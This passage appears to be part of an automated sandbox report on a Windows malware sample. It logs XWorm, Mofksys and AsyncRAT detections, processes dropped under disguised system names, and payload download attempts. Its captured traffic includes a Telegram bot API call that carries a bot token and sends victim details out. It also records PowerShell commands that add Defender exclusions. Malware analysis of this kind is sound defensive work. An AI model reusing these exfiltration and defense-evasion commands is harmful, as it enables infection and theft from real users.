{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:56.147131920 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.5	60946	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:56.638997078 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:57.331805944 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:57 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:57.331821918 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.5	60947	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:57.625899076 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:58.320272923 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:58 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:58.320545912 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49765	149.154.167.220	443	7744	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-02 12:25:22 UTC	443	OUT	GET /bot6791686693:AAEHz_lfi8kl2cBD04Pylygl3eK5SddtxII/sendMessage?chat_id=5702314606&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A3D2CFD5CADE17C3471CE%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%203A4PCO_8_%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20Crypt HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-02 12:25:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 02 Sep 2024 12:25:22 GMT Content-Type: application/json Content-Length: 450 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-02 12:25:22 UTC	450	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 39 31 36 38 36 36 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 57 4f 52 4d 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4b 41 4c 4f 32 30 31 5f 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 30 32 33 31 34 36 30 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4b 6f 6c 6c 6f 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 52 61 6e 74 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 6f 6c 6c 6f 72 61 6e 74 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 35 32 37 39 39 32 32 2c 22 74 65 78 74 22 3a 22 Data Ascii: {"ok":true,"result":{"message_id":79,"from":{"id":6791686693,"is_bot":true,"first_name":"XWORM","username":"KALO201_BOT"},"chat":{"id":5702314606,"first_name":"Kollo","last_name":"Rante","username":"kollorante","type":"private"},"date":1725279922,"text":"

Target ID:	0
Start time:	08:23:52
Start date:	02/09/2024
Path:	C:\Users\user\Desktop\chiara.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\chiara.exe"
Imagebase:	0x400000
File size:	1'406'359 bytes
MD5 hash:	1C8C35C728F0AC7906153A4DA2244A74
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000000.2001681199.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:23:52
Start date:	02/09/2024
Path:	C:\Users\user\Desktop\chiara.exe
Wow64 process (32bit):	false
Commandline:	c:\users\user\desktop\chiara.exe
Imagebase:	0x7ff6ccc80000
File size:	1'267'961 bytes
MD5 hash:	BDEBF3879721FD16DBC911F31C675AB9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:23:52
Start date:	02/09/2024
Path:	C:\Windows\Resources\Themes\icsys.icn.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Resources\Themes\icsys.icn.exe
Imagebase:	0x400000
File size:	138'373 bytes
MD5 hash:	4D76C5FFDB96E3DFCAFB57DA763E9D31
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000000.2008195461.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000003.00000002.2078868088.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:23:53
Start date:	02/09/2024
Path:	C:\Windows\Resources\Themes\explorer.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\resources\themes\explorer.exe
Imagebase:	0x400000
File size:	138'358 bytes
MD5 hash:	BB11F2754E3A66599975C5F2EEBC8B6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000004.00000002.3257810116.0000000000402000.00000080.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000004.00000000.2016360803.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:23:54
Start date:	02/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	08:23:54
Start date:	02/09/2024
Path:	C:\Windows\Resources\spoolsv.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\resources\spoolsv.exe SE
Imagebase:	0x400000
File size:	138'413 bytes
MD5 hash:	1E8FD9AB3425B7B8E99567C3A820C372
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000007.00000002.2077929477.0000000000402000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000007.00000000.2026328505.0000000000401000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:23:55
Start date:	02/09/2024
Path:	C:\Windows\Resources\svchost.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\resources\svchost.exe
Imagebase:	0x400000
File size:	138'342 bytes
MD5 hash:	A92C1525A326CEB946667E8533099E63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000000.2028860171.0000000000401000.00000080.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	08:23:55
Start date:	02/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	08:23:56
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe"
Imagebase:	0x280000
File size:	978'944 bytes
MD5 hash:	7F2742F64322B2D1F9D5EBB7AA83E49A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2572034544.0000000004680000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000B.00000002.2577651700.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000B.00000002.2572034544.00000000043CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000B.00000002.2572034544.000000000453F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2572034544.0000000004751000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2538242356.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2538242356.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:23:58
Start date:	02/09/2024
Path:	C:\Windows\Resources\spoolsv.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\resources\spoolsv.exe PR
Imagebase:	0x400000
File size:	138'413 bytes
MD5 hash:	1E8FD9AB3425B7B8E99567C3A820C372
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000C.00000002.2074461666.0000000000402000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000C.00000000.2061337651.0000000000401000.00000080.00000001.01000000.00000012.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:24:04
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x2a0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000D.00000002.2155637688.0000000000372000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:24:07
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x200000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:24:10
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x3f0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:24:10
Start date:	02/09/2024
Path:	C:\Windows\Resources\Themes\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\windows\resources\themes\explorer.exe" RO
Imagebase:	0x400000
File size:	138'358 bytes
MD5 hash:	BB11F2754E3A66599975C5F2EEBC8B6D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000011.00000000.2182852685.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000011.00000002.2182972944.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:24:11
Start date:	02/09/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	08:24:11
Start date:	02/09/2024
Path:	C:\Windows\Resources\Themes\explorer.exe
Wow64 process (32bit):	true
Commandline:	"C:\windows\resources\themes\explorer.exe" RO
Imagebase:	0x400000
File size:	138'358 bytes
MD5 hash:	BB11F2754E3A66599975C5F2EEBC8B6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000014.00000000.2195592157.0000000000401000.00000080.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000014.00000002.2197703621.0000000000402000.00000080.00000001.01000000.0000000D.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:24:12
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xae0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	08:24:18
Start date:	02/09/2024
Path:	C:\Windows\Resources\svchost.exe
Wow64 process (32bit):	false
Commandline:	"C:\windows\resources\svchost.exe" RO
Imagebase:	0x400000
File size:	138'342 bytes
MD5 hash:	A92C1525A326CEB946667E8533099E63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000016.00000002.2264439657.0000000000401000.00000080.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000016.00000000.2264228673.0000000000401000.00000080.00000001.01000000.00000013.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:24:18
Start date:	02/09/2024
Path:	C:\Windows\System32\consent.exe
Wow64 process (32bit):	false
Commandline:	consent.exe 5152 322 0000013E5E228840
Imagebase:	0x7ff739f80000
File size:	186'704 bytes
MD5 hash:	DD5032EF160209E470E2612A8A3D5F59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000017.00000003.2270943066.00000236016E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:24:19
Start date:	02/09/2024
Path:	C:\Windows\Resources\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\windows\resources\svchost.exe" RO
Imagebase:	0x400000
File size:	138'342 bytes
MD5 hash:	A92C1525A326CEB946667E8533099E63
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000018.00000000.2272315679.0000000000401000.00000080.00000001.01000000.00000013.sdmp, Author: Joe Security Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000018.00000002.2275043598.0000000000402000.00000080.00000001.01000000.00000013.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:24:46
Start date:	02/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Imagebase:	0x840000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:24:46
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:24:52
Start date:	02/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe'
Imagebase:	0x840000
File size:	433'152 bytes
